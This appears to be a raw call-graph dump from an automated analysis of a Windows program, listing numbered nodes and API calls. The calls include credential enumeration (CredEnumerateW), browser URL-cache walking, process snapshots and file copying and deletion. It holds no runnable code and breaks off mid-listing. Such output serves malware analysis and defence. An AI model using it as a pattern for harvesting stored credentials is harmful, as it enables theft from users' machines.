38005->37915 38008 409a37 38006->38008 38009 409a1c 38006->38009 38008->37915 38010 409a30 free 38009->38010 38011 409a20 memcpy 38009->38011 38010->38008 38011->38010 38013 40a9e7 38012->38013 38014 40a9dc free 38012->38014 38015 4099f4 3 API calls 38013->38015 38016 40a9f2 38014->38016 38015->38016 38016->37920 38041 409bca GetModuleFileNameW 38017->38041 38019 40dce6 wcsrchr 38020 40dcf5 38019->38020 38021 40dcf9 wcscat 38019->38021 38020->38021 38021->37927 38042 44db70 38022->38042 38024 40dbb4 memset memset 38044 409bca GetModuleFileNameW 38024->38044 38026 40dbfd 38045 4447d9 38026->38045 38029 40dc34 wcscpy wcscpy 38071 40d6f5 38029->38071 38030 40dc1f wcscpy 38030->38029 38033 40d6f5 3 API calls 38034 40dc73 38033->38034 38035 40d6f5 3 API calls 38034->38035 38036 40dc89 38035->38036 38037 40d6f5 3 API calls 38036->38037 38038 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38037->38038 38077 40da80 38038->38077 38041->38019 38043 44db77 38042->38043 38043->38024 38043->38043 38044->38026 38047 4447f4 38045->38047 38046 40dc1b 38046->38029 38046->38030 38047->38046 38048 444807 ??2@YAPAXI 38047->38048 38049 44481f 38048->38049 38050 444873 _snwprintf 38049->38050 38051 4448ab wcscpy 38049->38051 38084 44474a 8 API calls 38050->38084 38053 4448bb 38051->38053 38085 44474a 8 API calls 38053->38085 38054 4448a7 38054->38051 38054->38053 38056 4448cd 38086 44474a 8 API calls 38056->38086 38058 4448e2 38087 44474a 8 API calls 38058->38087 38060 4448f7 38088 44474a 8 API calls 38060->38088 38062 44490c 38089 44474a 8 API calls 38062->38089 38064 444921 38090 44474a 8 API calls 38064->38090 38066 444936 38091 44474a 8 API calls 38066->38091 38068 44494b 38092 44474a 8 API calls 38068->38092 38070 444960 ??3@YAXPAX 38070->38046 38072 44db70 38071->38072 38073 40d702 memset GetPrivateProfileStringW 38072->38073 38074 40d752 38073->38074 38075 40d75c WritePrivateProfileStringW 38073->38075 38074->38075 38076 40d758 38074->38076 38075->38076 38076->38033 38078 44db70 38077->38078 38079 40da8d memset 38078->38079 38080 40daac LoadStringW 38079->38080 38083 40dac6 38080->38083 38082 40dade 38082->37856 38083->38080 38083->38082 38093 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38083->38093 38084->38054 38085->38056 38086->38058 38087->38060 38088->38062 38089->38064 38090->38066 38091->38068 38092->38070 38093->38083 38104 409b98 GetFileAttributesW 38094->38104 38096 40daea 38097 40daef wcscpy wcscpy GetPrivateProfileIntW 38096->38097 38103 40db63 38096->38103 38105 40d65d GetPrivateProfileStringW 38097->38105 38099 40db3e 38106 40d65d GetPrivateProfileStringW 38099->38106 38101 40db4f 38107 40d65d GetPrivateProfileStringW 38101->38107 38103->37858 38104->38096 38105->38099 38106->38101 38107->38103 38144 40eaff 38108->38144 38112 411ae2 memset 38111->38112 38113 411b8f 38111->38113 38184 409bca GetModuleFileNameW 38112->38184 38125 411a8b 38113->38125 38115 411b0a wcsrchr 38116 411b22 wcscat 38115->38116 38117 411b1f 38115->38117 38185 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38116->38185 38117->38116 38119 411b67 38186 402afb 38119->38186 38123 411b7f 38242 40ea13 SendMessageW memset SendMessageW 38123->38242 38126 402afb 27 API calls 38125->38126 38127 411ac0 38126->38127 38128 4110dc 38127->38128 38129 41113e 38128->38129 38134 4110f0 38128->38134 38267 40969c LoadCursorW SetCursor 38129->38267 38131 411143 38268 444a54 38131->38268 38271 4032b4 38131->38271 38289 40b1ab free free 38131->38289 38132 4110f7 _wcsicmp 38132->38134 38133 411157 38135 40ada2 _wcsicmp 38133->38135 38134->38129 38134->38132 38290 410c46 10 API calls 38134->38290 38138 411167 38135->38138 38136 4111af 38138->38136 38139 4111a6 qsort 38138->38139 38139->38136 38143->37939 38145 40eb10 38144->38145 38157 40e8e0 38145->38157 38148 40eb6c memcpy memcpy 38149 40ebb7 38148->38149 38149->38148 38150 40ebf2 ??2@YAPAXI ??2@YAPAXI 38149->38150 38153 40d134 16 API calls 38149->38153 38151 40ec2e ??2@YAPAXI 38150->38151 38152 40ec65 38150->38152 38151->38152 38167 40ea7f 38152->38167 38153->38149 38156 402f49 38156->37939 38158 40e8f2 38157->38158 38159 40e8eb ??3@YAXPAX 38157->38159 38160 40e900 38158->38160 38161 40e8f9 ??3@YAXPAX 38158->38161 38159->38158 38162 40e911 38160->38162 38163 40e90a ??3@YAXPAX 38160->38163 38161->38160 38164 40e931 ??2@YAPAXI ??2@YAPAXI 38162->38164 38165 40e921 ??3@YAXPAX 38162->38165 38166 40e92a ??3@YAXPAX 38162->38166 38163->38162 38164->38148 38165->38166 38166->38164 38168 40aa04 free 38167->38168 38169 40ea88 38168->38169 38170 40aa04 free 38169->38170 38171 40ea90 38170->38171 38172 40aa04 free 38171->38172 38173 40ea98 38172->38173 38174 40aa04 free 38173->38174 38175 40eaa0 38174->38175 38176 40a9ce 4 API calls 38175->38176 38177 40eab3 38176->38177 38178 40a9ce 4 API calls 38177->38178 38179 40eabd 38178->38179 38180 40a9ce 4 API calls 38179->38180 38181 40eac7 38180->38181 38182 40a9ce 4 API calls 38181->38182 38183 40ead1 38182->38183 38183->38156 38184->38115 38185->38119 38243 40b2cc 38186->38243 38188 402b0a 38189 40b2cc 27 API calls 38188->38189 38190 402b23 38189->38190 38191 40b2cc 27 API calls 38190->38191 38192 402b3a 38191->38192 38193 40b2cc 27 API calls 38192->38193 38194 402b54 38193->38194 38195 40b2cc 27 API calls 38194->38195 38196 402b6b 38195->38196 38197 40b2cc 27 API calls 38196->38197 38198 402b82 38197->38198 38199 40b2cc 27 API calls 38198->38199 38200 402b99 38199->38200 38201 40b2cc 27 API calls 38200->38201 38202 402bb0 38201->38202 38203 40b2cc 27 API calls 38202->38203 38204 402bc7 38203->38204 38205 40b2cc 27 API calls 38204->38205 38206 402bde 38205->38206 38207 40b2cc 27 API calls 38206->38207 38208 402bf5 38207->38208 38209 40b2cc 27 API calls 38208->38209 38210 402c0c 38209->38210 38211 40b2cc 27 API calls 38210->38211 38212 402c23 38211->38212 38213 40b2cc 27 API calls 38212->38213 38214 402c3a 38213->38214 38215 40b2cc 27 API calls 38214->38215 38216 402c51 38215->38216 38217 40b2cc 27 API calls 38216->38217 38218 402c68 38217->38218 38219 40b2cc 27 API calls 38218->38219 38220 402c7f 38219->38220 38221 40b2cc 27 API calls 38220->38221 38222 402c99 38221->38222 38223 40b2cc 27 API calls 38222->38223 38224 402cb3 38223->38224 38225 40b2cc 27 API calls 38224->38225 38226 402cd5 38225->38226 38227 40b2cc 27 API calls 38226->38227 38228 402cf0 38227->38228 38229 40b2cc 27 API calls 38228->38229 38230 402d0b 38229->38230 38231 40b2cc 27 API calls 38230->38231 38232 402d26 38231->38232 38233 40b2cc 27 API calls 38232->38233 38234 402d3e 38233->38234 38235 40b2cc 27 API calls 38234->38235 38236 402d59 38235->38236 38237 40b2cc 27 API calls 38236->38237 38238 402d78 38237->38238 38239 40b2cc 27 API calls 38238->38239 38240 402d93 38239->38240 38241 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38240->38241 38241->38123 38242->38113 38246 40b58d 38243->38246 38245 40b2d1 38245->38188 38247 40b5a4 GetModuleHandleW FindResourceW 38246->38247 38248 40b62e 38246->38248 38249 40b5c2 LoadResource 38247->38249 38251 40b5e7 38247->38251 38248->38245 38250 40b5d0 SizeofResource LockResource 38249->38250 38249->38251 38250->38251 38251->38248 38259 40afcf 38251->38259 38253 40b608 memcpy 38262 40b4d3 memcpy 38253->38262 38255 40b61e 38263 40b3c1 18 API calls 38255->38263 38257 40b626 38264 40b04b 38257->38264 38260 40b04b ??3@YAXPAX 38259->38260 38261 40afd7 ??2@YAPAXI 38260->38261 38261->38253 38262->38255 38263->38257 38265 40b051 ??3@YAXPAX 38264->38265 38266 40b05f 38264->38266 38265->38266 38266->38248 38267->38131 38269 444a64 FreeLibrary 38268->38269 38270 444a83 38268->38270 38269->38270 38270->38133 38272 4032c4 38271->38272 38273 40b633 free 38272->38273 38274 403316 38273->38274 38291 44553b 38274->38291 38278 403480 38489 40368c 15 API calls 38278->38489 38280 403489 38281 40b633 free 38280->38281 38283 403495 38281->38283 38282 40333c 38282->38278 38284 4033a9 memset memcpy 38282->38284 38285 4033ec wcscmp 38282->38285 38487 4028e7 11 API calls 38282->38487 38488 40f508 6 API calls 38282->38488 38283->38133 38284->38282 38284->38285 38285->38282 38288 403421 _wcsicmp 38288->38282 38289->38133 38290->38134 38292 445548 38291->38292 38293 445599 38292->38293 38490 40c768 38292->38490 38294 4455a8 memset 38293->38294 38301 4457f2 38293->38301 38573 403988 38294->38573 38304 445854 38301->38304 38675 403e2d memset memset memset memset memset 38301->38675 38302 4455e5 38313 445672 38302->38313 38318 44560f 38302->38318 38303 4458bb memset memset 38306 414c2e 17 API calls 38303->38306 38357 4458aa 38304->38357 38698 403c9c memset memset memset memset memset 38304->38698 38309 4458f9 38306->38309 38308 44595e memset memset 38316 414c2e 17 API calls 38308->38316 38317 40b2cc 27 API calls 38309->38317 38311 44558c 38557 444b06 38311->38557 38312 44557a 38312->38311 38771 4136c0 CoTaskMemFree 38312->38771 38584 403fbe memset memset memset memset memset 38313->38584 38314 445a00 memset memset 38721 414c2e 38314->38721 38315 445b22 38321 445bca 38315->38321 38322 445b38 memset memset memset 38315->38322 38326 44599c 38316->38326 38328 445909 38317->38328 38330 4087b3 338 API calls 38318->38330 38320 445849 38787 40b1ab free free 38320->38787 38329 445c8b memset memset 38321->38329 38395 445cf0 38321->38395 38333 445bd4 38322->38333 38334 445b98 38322->38334 38327 40b2cc 27 API calls 38326->38327 38341 4459ac 38327->38341 38338 409d1f 6 API calls 38328->38338 38342 414c2e 17 API calls 38329->38342 38339 445621 38330->38339 38331 44589f 38788 40b1ab free free 38331->38788 38332 445585 38772 41366b FreeLibrary 38332->38772 38348 414c2e 17 API calls 38333->38348 38334->38333 38344 445ba2 38334->38344 38337 403335 38486 4452e5 45 API calls 38337->38486 38352 445919 38338->38352 38773 4454bf 20 API calls 38339->38773 38340 445823 38340->38320 38362 4087b3 338 API calls 38340->38362 38353 409d1f 6 API calls 38341->38353 38354 445cc9 38342->38354 38860 4099c6 wcslen 38344->38860 38345 4456b2 38775 40b1ab free free 38345->38775 38347 40b2cc 27 API calls 38358 445a4f 38347->38358 38349 445be2 38348->38349 38360 40b2cc 27 API calls 38349->38360 38350 445d3d 38380 40b2cc 27 API calls 38350->38380 38351 445d88 memset memset memset 38363 414c2e 17 API calls 38351->38363 38789 409b98 GetFileAttributesW 38352->38789 38364 4459bc 38353->38364 38365 409d1f 6 API calls 38354->38365 38355 445879 38355->38331 38376 4087b3 338 API calls 38355->38376 38357->38303 38381 44594a 38357->38381 38737 409d1f wcslen wcslen 38358->38737 38370 445bf3 38360->38370 38362->38340 38373 445dde 38363->38373 38856 409b98 GetFileAttributesW 38364->38856 38375 445ce1 38365->38375 38366 445bb3 38863 445403 memset 38366->38863 38367 445680 38367->38345 38607 4087b3 memset 38367->38607 38379 409d1f 6 API calls 38370->38379 38371 445928 38371->38381 38790 40b6ef 38371->38790 38382 40b2cc 27 API calls 38373->38382 38880 409b98 GetFileAttributesW 38375->38880 38376->38355 38378 40b2cc 27 API calls 38387 445a94 38378->38387 38389 445c07 38379->38389 38390 445d54 _wcsicmp 38380->38390 38381->38308 38394 4459ed 38381->38394 38393 445def 38382->38393 38383 4459cb 38383->38394 38403 40b6ef 253 API calls 38383->38403 38742 40ae18 38387->38742 38388 44566d 38388->38301 38658 413d4c 38388->38658 38399 445389 259 API calls 38389->38399 38400 445d71 38390->38400 38463 445d67 38390->38463 38392 445665 38774 40b1ab free free 38392->38774 38401 409d1f 6 API calls 38393->38401 38394->38314 38394->38315 38395->38337 38395->38350 38395->38351 38396 445389 259 API calls 38396->38321 38405 445c17 38399->38405 38881 445093 23 API calls 38400->38881 38408 445e03 38401->38408 38403->38394 38404 4456d8 38410 40b2cc 27 API calls 38404->38410 38411 40b2cc 27 API calls 38405->38411 38407 44563c 38407->38392 38413 4087b3 338 API calls 38407->38413 38882 409b98 GetFileAttributesW 38408->38882 38409 40b6ef 253 API calls 38409->38337 38415 4456e2 38410->38415 38416 445c23 38411->38416 38412 445d83 38412->38337 38413->38407 38776 413fa6 _wcsicmp _wcsicmp 38415->38776 38420 409d1f 6 API calls 38416->38420 38418 445e12 38424 445e6b 38418->38424 38431 40b2cc 27 API calls 38418->38431 38422 445c37 38420->38422 38421 4456eb 38427 4456fd memset memset memset memset 38421->38427 38428 4457ea 38421->38428 38429 445389 259 API calls 38422->38429 38423 445b17 38857 40aebe 38423->38857 38884 445093 23 API calls 38424->38884 38777 409c70 wcscpy wcsrchr 38427->38777 38780 413d29 38428->38780 38434 445c47 38429->38434 38435 445e33 38431->38435 38432 445e7e 38437 445f67 38432->38437 38440 40b2cc 27 API calls 38434->38440 38441 409d1f 6 API calls 38435->38441 38446 40b2cc 27 API calls 38437->38446 38438 445ab2 memset 38442 40b2cc 27 API calls 38438->38442 38444 445c53 38440->38444 38445 445e47 38441->38445 38447 445aa1 38442->38447 38443 409c70 2 API calls 38448 44577e 38443->38448 38449 409d1f 6 API calls 38444->38449 38883 409b98 GetFileAttributesW 38445->38883 38451 445f73 38446->38451 38447->38423 38447->38438 38452 409d1f 6 API calls 38447->38452 38749 40add4 38447->38749 38754 445389 38447->38754 38763 40ae51 38447->38763 38453 409c70 2 API calls 38448->38453 38454 445c67 38449->38454 38456 409d1f 6 API calls 38451->38456 38452->38447 38457 44578d 38453->38457 38458 445389 259 API calls 38454->38458 38455 445e56 38455->38424 38461 445e83 memset 38455->38461 38459 445f87 38456->38459 38457->38428 38465 40b2cc 27 API calls 38457->38465 38458->38321 38887 409b98 GetFileAttributesW 38459->38887 38464 40b2cc 27 API calls 38461->38464 38463->38337 38463->38409 38466 445eab 38464->38466 38467 4457a8 38465->38467 38468 409d1f 6 API calls 38466->38468 38469 409d1f 6 API calls 38467->38469 38470 445ebf 38468->38470 38471 4457b8 38469->38471 38472 40ae18 9 API calls 38470->38472 38779 409b98 GetFileAttributesW 38471->38779 38482 445ef5 38472->38482 38474 4457c7 38474->38428 38476 4087b3 338 API calls 38474->38476 38475 40ae51 9 API calls 38475->38482 38476->38428 38477 445f5c 38479 40aebe FindClose 38477->38479 38478 40add4 2 API calls 38478->38482 38479->38437 38480 40b2cc 27 API calls 38480->38482 38481 409d1f 6 API calls 38481->38482 38482->38475 38482->38477 38482->38478 38482->38480 38482->38481 38484 445f3a 38482->38484 38885 409b98 GetFileAttributesW 38482->38885 38886 445093 23 API calls 38484->38886 38486->38282 38487->38288 38488->38282 38489->38280 38491 40c775 38490->38491 38888 40b1ab free free 38491->38888 38493 40c788 38889 40b1ab free free 38493->38889 38495 40c790 38890 40b1ab free free 38495->38890 38497 40c798 38498 40aa04 free 38497->38498 38499 40c7a0 38498->38499 38891 40c274 memset 38499->38891 38504 40a8ab 9 API calls 38505 40c7c3 38504->38505 38506 40a8ab 9 API calls 38505->38506 38507 40c7d0 38506->38507 38920 40c3c3 38507->38920 38511 40c877 38520 40bdb0 38511->38520 38512 40c86c 38962 4053fe 39 API calls 38512->38962 38513 40c7e5 38513->38511 38513->38512 38519 40c634 50 API calls 38513->38519 38945 40a706 38513->38945 38519->38513 39245 404363 38520->39245 38523 40bf5d 39265 40440c 38523->39265 38524 40bdee 38524->38523 38528 40b2cc 27 API calls 38524->38528 38525 40bddf CredEnumerateW 38525->38524 38529 40be02 wcslen 38528->38529 38529->38523 38536 40be1e 38529->38536 38530 40be26 wcsncmp 38530->38536 38533 40be7d memset 38534 40bea7 memcpy 38533->38534 38533->38536 38535 40bf11 wcschr 38534->38535 38534->38536 38535->38536 38536->38523 38536->38530 38536->38533 38536->38534 38536->38535 38537 40b2cc 27 API calls 38536->38537 38539 40bf43 LocalFree 38536->38539 39268 40bd5d 28 API calls 38536->39268 39269 404423 38536->39269 38538 40bef6 _wcsnicmp 38537->38538 38538->38535 38538->38536 38539->38536 38540 4135f7 39284 4135e0 38540->39284 38543 40b2cc 27 API calls 38544 41360d 38543->38544 38545 40a804 8 API calls 38544->38545 38546 413613 38545->38546 38547 41361b 38546->38547 38548 41363e 38546->38548 38549 40b273 27 API calls 38547->38549 38550 4135e0 FreeLibrary 38548->38550 38551 413625 GetProcAddress 38549->38551 38552 413643 38550->38552 38551->38548 38553 413648 38551->38553 38552->38312 38554 413658 38553->38554 38555 4135e0 FreeLibrary 38553->38555 38554->38312 38556 413666 38555->38556 38556->38312 39287 4449b9 38557->39287 38560 444c1f 38560->38293 38561 4449b9 42 API calls 38563 444b4b 38561->38563 38562 444c15 38565 4449b9 42 API calls 38562->38565 38563->38562 39308 444972 GetVersionExW 38563->39308 38565->38560 38566 444b99 memcmp 38571 444b8c 38566->38571 38567 444c0b 39312 444a85 42 API calls 38567->39312 38571->38566 38571->38567 39309 444aa5 42 API calls 38571->39309 39310 40a7a0 GetVersionExW 38571->39310 39311 444a85 42 API calls 38571->39311 38574 40399d 38573->38574 39313 403a16 38574->39313 38576 403a09 39327 40b1ab free free 38576->39327 38578 403a12 wcsrchr 38578->38302 38579 4039a3 38579->38576 38582 4039f4 38579->38582 39324 40a02c CreateFileW 38579->39324 38582->38576 38583 4099c6 2 API calls 38582->38583 38583->38576 38585 414c2e 17 API calls 38584->38585 38586 404048 38585->38586 38587 414c2e 17 API calls 38586->38587 38588 404056 38587->38588 38589 409d1f 6 API calls 38588->38589 38590 404073 38589->38590 38591 409d1f 6 API calls 38590->38591 38592 40408e 38591->38592 38593 409d1f 6 API calls 38592->38593 38594 4040a6 38593->38594 38595 403af5 20 API calls 38594->38595 38596 4040ba 38595->38596 38597 403af5 20 API calls 38596->38597 38598 4040cb 38597->38598 39354 40414f memset 38598->39354 38600 404140 39368 40b1ab free free 38600->39368 38601 4040ec memset 38605 4040e0 38601->38605 38603 404148 38603->38367 38604 4099c6 2 API calls 38604->38605 38605->38600 38605->38601 38605->38604 38606 40a8ab 9 API calls 38605->38606 38606->38605 39381 40a6e6 WideCharToMultiByte 38607->39381 38609 4087ed 39382 4095d9 memset 38609->39382 38612 408809 memset memset memset memset memset 38613 40b2cc 27 API calls 38612->38613 38614 4088a1 38613->38614 38615 409d1f 6 API calls 38614->38615 38616 4088b1 38615->38616 38617 40b2cc 27 API calls 38616->38617 38618 4088c0 38617->38618 38619 409d1f 6 API calls 38618->38619 38620 4088d0 38619->38620 38621 40b2cc 27 API calls 38620->38621 38622 4088df 38621->38622 38623 409d1f 6 API calls 38622->38623 38624 4088ef 38623->38624 38625 40b2cc 27 API calls 38624->38625 38626 4088fe 38625->38626 38627 409d1f 6 API calls 38626->38627 38639 408953 38639->38367 38659 40b633 free 38658->38659 38660 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38659->38660 38661 413f00 Process32NextW 38660->38661 38662 413da5 OpenProcess 38661->38662 38663 413f17 CloseHandle 38661->38663 38664 413eb0 38662->38664 38665 413df3 memset 38662->38665 38663->38404 38664->38661 38667 413ebf free 38664->38667 38668 4099f4 3 API calls 38664->38668 39807 413f27 38665->39807 38667->38664 38668->38664 38669 413e37 GetModuleHandleW 38671 413e46 GetProcAddress 38669->38671 38672 413e1f 38669->38672 38671->38672 38672->38669 39812 413959 38672->39812 39828 413ca4 38672->39828 38674 413ea2 CloseHandle 38674->38664 38676 414c2e 17 API calls 38675->38676 38677 403eb7 38676->38677 38678 414c2e 17 API calls 38677->38678 38679 403ec5 38678->38679 38680 409d1f 6 API calls 38679->38680 38681 403ee2 38680->38681 38682 409d1f 6 API calls 38681->38682 38683 403efd 38682->38683 38684 409d1f 6 API calls 38683->38684 38685 403f15 38684->38685 38686 403af5 20 API calls 38685->38686 38687 403f29 38686->38687 38688 403af5 20 API calls 38687->38688 38689 403f3a 38688->38689 38690 40414f 33 API calls 38689->38690 38696 403f4f 38690->38696 38691 403faf 39842 40b1ab free free 38691->39842 38693 403f5b memset 38693->38696 38694 403fb7 38694->38340 38695 4099c6 2 API calls 38695->38696 38696->38691 38696->38693 38696->38695 38697 40a8ab 9 API calls 38696->38697 38697->38696 38699 414c2e 17 API calls 38698->38699 38700 403d26 38699->38700 38701 414c2e 17 API calls 38700->38701 38702 403d34 38701->38702 38703 409d1f 6 API calls 38702->38703 38704 403d51 38703->38704 38705 409d1f 6 API calls 38704->38705 38706 403d6c 38705->38706 38707 409d1f 6 API calls 38706->38707 38708 403d84 38707->38708 38709 403af5 20 API calls 38708->38709 38710 403d98 38709->38710 38711 403af5 20 API calls 38710->38711 38712 403da9 38711->38712 38713 40414f 33 API calls 38712->38713 38718 403dbe 38713->38718 38714 403e1e 39843 40b1ab free free 38714->39843 38716 403dca memset 38716->38718 38717 403e26 38717->38355 38718->38714 38718->38716 38719 4099c6 2 API calls 38718->38719 38720 40a8ab 9 API calls 38718->38720 38719->38718 38720->38718 38722 414b81 9 API calls 38721->38722 38724 414c40 38722->38724 38723 414c73 memset 38726 414c94 38723->38726 38724->38723 39844 409cea 38724->39844 39847 414592 RegOpenKeyExW 38726->39847 38729 414c64 SHGetSpecialFolderPathW 38731 414d0b 38729->38731 38730 414cc1 38732 414cf4 wcscpy 38730->38732 39848 414bb0 wcscpy 38730->39848 38731->38347 38732->38731 38734 414cd2 39849 4145ac RegQueryValueExW 38734->39849 38736 414ce9 RegCloseKey 38736->38732 38738 409d62 38737->38738 38739 409d43 wcscpy 38737->38739 38738->38378 38740 409719 2 API calls 38739->38740 38741 409d51 wcscat 38740->38741 38741->38738 38743 40aebe FindClose 38742->38743 38744 40ae21 38743->38744 38745 4099c6 2 API calls 38744->38745 38746 40ae35 38745->38746 38747 409d1f 6 API calls 38746->38747 38748 40ae49 38747->38748 38748->38447 38750 40ade0 38749->38750 38753 40ae0f 38749->38753 38751 40ade7 wcscmp 38750->38751 38750->38753 38752 40adfe wcscmp 38751->38752 38751->38753 38752->38753 38753->38447 38755 40ae18 9 API calls 38754->38755 38760 4453c4 38755->38760 38756 40ae51 9 API calls 38756->38760 38757 4453f3 38759 40aebe FindClose 38757->38759 38758 40add4 2 API calls 38758->38760 38761 4453fe 38759->38761 38760->38756 38760->38757 38760->38758 38762 445403 254 API calls 38760->38762 38761->38447 38762->38760 38764 40ae7b FindNextFileW 38763->38764 38765 40ae5c FindFirstFileW 38763->38765 38766 40ae94 38764->38766 38767 40ae8f 38764->38767 38765->38766 38769 40aeb6 38766->38769 38770 409d1f 6 API calls 38766->38770 38768 40aebe FindClose 38767->38768 38768->38766 38769->38447 38770->38769 38771->38332 38772->38311 38773->38407 38774->38388 38775->38388 38776->38421 38778 409c89 38777->38778 38778->38443 38779->38474 38781 413d39 38780->38781 38782 413d2f FreeLibrary 38780->38782 38783 40b633 free 38781->38783 38782->38781 38784 413d42 38783->38784 38785 40b633 free 38784->38785 38786 413d4a 38785->38786 38786->38301 38787->38304 38788->38357 38789->38371 38791 44db70 38790->38791 38792 40b6fc memset 38791->38792 38793 409c70 2 API calls 38792->38793 38794 40b732 wcsrchr 38793->38794 38795 40b743 38794->38795 38796 40b746 memset 38794->38796 38795->38796 38797 40b2cc 27 API calls 38796->38797 38798 40b76f 38797->38798 38799 409d1f 6 API calls 38798->38799 38800 40b783 38799->38800 39850 409b98 GetFileAttributesW 38800->39850 38802 40b792 38803 40b7c2 38802->38803 38804 409c70 2 API calls 38802->38804 39851 40bb98 38803->39851 38806 40b7a5 38804->38806 38808 40b2cc 27 API calls 38806->38808 38812 40b7b2 38808->38812 38809 40b837 CloseHandle 38811 40b83e memset 38809->38811 38810 40b817 38813 409a45 3 API calls 38810->38813 39884 40a6e6 WideCharToMultiByte 38811->39884 38815 409d1f 6 API calls 38812->38815 38816 40b827 CopyFileW 38813->38816 38815->38803 38816->38811 38817 40b866 38818 444432 121 API calls 38817->38818 38820 40b879 38818->38820 38819 40bad5 38822 40baeb 38819->38822 38823 40bade DeleteFileW 38819->38823 38820->38819 38821 40b273 27 API calls 38820->38821 38824 40b89a 38821->38824 38825 40b04b ??3@YAXPAX 38822->38825 38823->38822 38826 438552 134 API calls 38824->38826 38827 40baf3 38825->38827 38828 40b8a4 38826->38828 38827->38381 38829 40bacd 38828->38829 38831 4251c4 137 API calls 38828->38831 38830 443d90 111 API calls 38829->38830 38830->38819 38854 40b8b8 38831->38854 38832 40bac6 39894 424f26 123 API calls 38832->39894 38833 40b8bd memset 39885 425413 17 API calls 38833->39885 38836 425413 17 API calls 38836->38854 38839 40a71b MultiByteToWideChar 38839->38854 38840 40a734 MultiByteToWideChar 38840->38854 38843 40b9b5 memcmp 38843->38854 38844 4099c6 2 API calls 38844->38854 38845 404423 38 API calls 38845->38854 38848 40bb3e memset memcpy 39895 40a734 MultiByteToWideChar 38848->39895 38849 4251c4 137 API calls 38849->38854 38851 40bb88 LocalFree 38851->38854 38854->38832 38854->38833 38854->38836 38854->38839 38854->38840 38854->38843 38854->38844 38854->38845 38854->38848 38854->38849 38855 40ba5f memcmp 38854->38855 39886 4253ef 16 API calls 38854->39886 39887 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38854->39887 39888 4253af 17 API calls 38854->39888 39889 4253cf 17 API calls 38854->39889 39890 447280 memset 38854->39890 39891 447960 memset memcpy memcpy memcpy 38854->39891 39892 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38854->39892 39893 447920 memcpy memcpy memcpy 38854->39893 38855->38854 38856->38383 38858 40aed1 38857->38858 38859 40aec7 FindClose 38857->38859 38858->38315 38859->38858 38861 4099d7 38860->38861 38862 4099da memcpy 38860->38862 38861->38862 38862->38366 38864 40b2cc 27 API calls 38863->38864 38865 44543f 38864->38865 38866 409d1f 6 API calls 38865->38866 38867 44544f 38866->38867 39979 409b98 GetFileAttributesW 38867->39979 38869 44545e 38870 445476 38869->38870 38871 40b6ef 253 API calls 38869->38871 38872 40b2cc 27 API calls 38870->38872 38871->38870 38873 445482 38872->38873 38874 409d1f 6 API calls 38873->38874 38875 445492 38874->38875 39980 409b98 GetFileAttributesW 38875->39980 38877 4454a1 38878 4454b9 38877->38878 38879 40b6ef 253 API calls 38877->38879 38878->38396 38879->38878 38880->38395 38881->38412 38882->38418 38883->38455 38884->38432 38885->38482 38886->38482 38887->38463 38888->38493 38889->38495 38890->38497 38892 414c2e 17 API calls 38891->38892 38893 40c2ae 38892->38893 38963 40c1d3 38893->38963 38898 40c3be 38915 40a8ab 38898->38915 38899 40afcf 2 API calls 38900 40c2fd FindFirstUrlCacheEntryW 38899->38900 38901 40c3b6 38900->38901 38902 40c31e wcschr 38900->38902 38903 40b04b ??3@YAXPAX 38901->38903 38904 40c331 38902->38904 38905 40c35e FindNextUrlCacheEntryW 38902->38905 38903->38898 38907 40a8ab 9 API calls 38904->38907 38905->38902 38906 40c373 GetLastError 38905->38906 38908 40c3ad FindCloseUrlCache 38906->38908 38909 40c37e 38906->38909 38910 40c33e wcschr 38907->38910 38908->38901 38911 40afcf 2 API calls 38909->38911 38910->38905 38912 40c34f 38910->38912 38913 40c391 FindNextUrlCacheEntryW 38911->38913 38914 40a8ab 9 API calls 38912->38914 38913->38902 38913->38908 38914->38905 39172 40a97a 38915->39172 38918 40a8cc 38918->38504 38919 40a8d0 7 API calls 38919->38918 39177 40b1ab free free 38920->39177 38922 40c3dd 38923 40b2cc 27 API calls 38922->38923 38924 40c3e7 38923->38924 39178 414592 RegOpenKeyExW 38924->39178 38926 40c3f4 38927 40c50e 38926->38927 38928 40c3ff 38926->38928 38942 405337 38927->38942 38929 40a9ce 4 API calls 38928->38929 38930 40c418 memset 38929->38930 39179 40aa1d 38930->39179 38933 40c471 38935 40c47a _wcsupr 38933->38935 38934 40c505 RegCloseKey 38934->38927 38936 40a8d0 7 API calls 38935->38936 38937 40c498 38936->38937 38938 40a8d0 7 API calls 38937->38938 38939 40c4ac memset 38938->38939 38940 40aa1d 38939->38940 38941 40c4e4 RegEnumValueW 38940->38941 38941->38934 38941->38935 39181 405220 38942->39181 38946 4099c6 2 API calls 38945->38946 38947 40a714 _wcslwr 38946->38947 38948 40c634 38947->38948 39238 405361 38948->39238 38951 40c65c wcslen 39241 4053b6 39 API calls 38951->39241 38952 40c71d wcslen 38952->38513 38954 40c677 38955 40c713 38954->38955 39242 40538b 39 API calls 38954->39242 39244 4053df 39 API calls 38955->39244 38958 40c6a5 38958->38955 38959 40c6a9 memset 38958->38959 38960 40c6d3 38959->38960 39243 40c589 44 API calls 38960->39243 38962->38511 38964 40ae18 9 API calls 38963->38964 38970 40c210 38964->38970 38965 40ae51 9 API calls 38965->38970 38966 40c264 38967 40aebe FindClose 38966->38967 38969 40c26f 38967->38969 38968 40add4 2 API calls 38968->38970 38975 40e5ed memset memset 38969->38975 38970->38965 38970->38966 38970->38968 38971 40c231 _wcsicmp 38970->38971 38972 40c1d3 35 API calls 38970->38972 38971->38970 38973 40c248 38971->38973 38972->38970 38988 40c084 22 API calls 38973->38988 38976 414c2e 17 API calls 38975->38976 38977 40e63f 38976->38977 38978 409d1f 6 API calls 38977->38978 38979 40e658 38978->38979 38989 409b98 GetFileAttributesW 38979->38989 38981 40e667 38982 40e680 38981->38982 38983 409d1f 6 API calls 38981->38983 38990 409b98 GetFileAttributesW 38982->38990 38983->38982 38985 40e68f 38986 40c2d8 38985->38986 38991 40e4b2 38985->38991 38986->38898 38986->38899 38988->38970 38989->38981 38990->38985 39012 40e01e 38991->39012 38993 40e593 38994 40e5b0 38993->38994 38995 40e59c DeleteFileW 38993->38995 38996 40b04b ??3@YAXPAX 38994->38996 38995->38994 38998 40e5bb 38996->38998 38997 40e521 38997->38993 39035 40e175 